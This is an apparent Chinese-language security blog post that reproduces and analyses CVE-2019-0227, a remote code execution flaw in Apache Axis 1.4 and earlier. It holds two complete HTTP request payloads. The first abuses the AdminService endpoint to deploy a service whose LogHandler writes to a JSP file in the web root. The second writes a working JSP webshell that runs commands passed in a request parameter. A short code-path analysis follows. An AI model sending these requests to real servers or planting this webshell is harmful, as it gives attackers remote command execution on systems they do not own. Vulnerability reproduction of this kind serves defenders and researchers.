Apache Axis 1.4 Rce 漏洞復現&分析

0x01 漏洞背景

影響范圍：version <=1.4

漏洞編號：CVE-2019-0227

0x02 漏洞復現

搭建參考

https://g.yuque.com/corgi/vghqzi/nayqnl

訪問該頁面

請求services/AdminService接口，通過這個接口創建其他服務接口，例如寫入文件，執行命令等等。

poc1：

POST /TestAxis_war/services/AdminService HTTP/1.1
Host: 192.168.52.2:8088
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 1061

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns1:deployment
  xmlns="http://xml.apache.org/axis/wsdd/"
  xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
  xmlns:ns1="http://xml.apache.org/axis/wsdd/">
  <ns1:service name="RandomService" provider="java:RPC">
    <requestFlow>
      <handler type="RandomLog"/>
    </requestFlow>
    <ns1:parameter name="className" value="java.util.Random"/>
    <ns1:parameter name="allowedMethods" value="*"/>
  </ns1:service>
  <handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" >  
    <parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp" />   
    <parameter name="LogHandler.writeToConsole" value="false" /> 
  </handler>
</ns1:deployment>
  </soapenv:Body>
</soapenv:Envelope>

再次請求poc2，將webshell內容寫入到jsp文件中

POST /TestAxis_war/services/RandomService HTTP/1.1
Host: 192.168.52.2:8088
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept-Language: en-US,en;q=0.5
SOAPAction: something
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Accept-Encoding: gzip, deflate
Content-Length: 847

<?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Body>
        <api:main
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]></api:in0>
   </api:main>
  </soapenv:Body>
</soapenv:Envelope>

0x03 漏洞分析

該應用的接口，主要來源於配置文件，server-config.wsdd，從該配置文件開始分析

根據該配置文件，直接定位到org.apache.axis.utils.Admin#AdminServces，直接在該方法內下斷點進行調試

跟進proccess方法，首先是判斷是否開啟遠程管理員登陸，也就是本漏洞的利用條件之一，需要在配置文件中開啟。

繼續跟進到processWSDD方法，前面的幾個if判斷action都不用管，主要是這一塊

跟進saveConfiguration，其調用了寫入配置文件的操作

跟進writeEngineConfig方法，最終寫入server-config.wsdd配置文件中

從部署文件夾中看，該配置已寫入到配置文件中

當第二次請求的時候，指向調用org.apache.axis.handlers.LogHandler，通過寫日志的方式，將webshell寫入到規定好的jsp結尾的日志中，又因為該jsp被指定到webapps/Root界面，所以直接訪問該webshell即可。

0x04 參考

https://g.yuque.com/corgi/vghqzi/nayqnl

https://xz.aliyun.com/t/7981#toc-6

https://xz.aliyun.com/t/5513#toc-4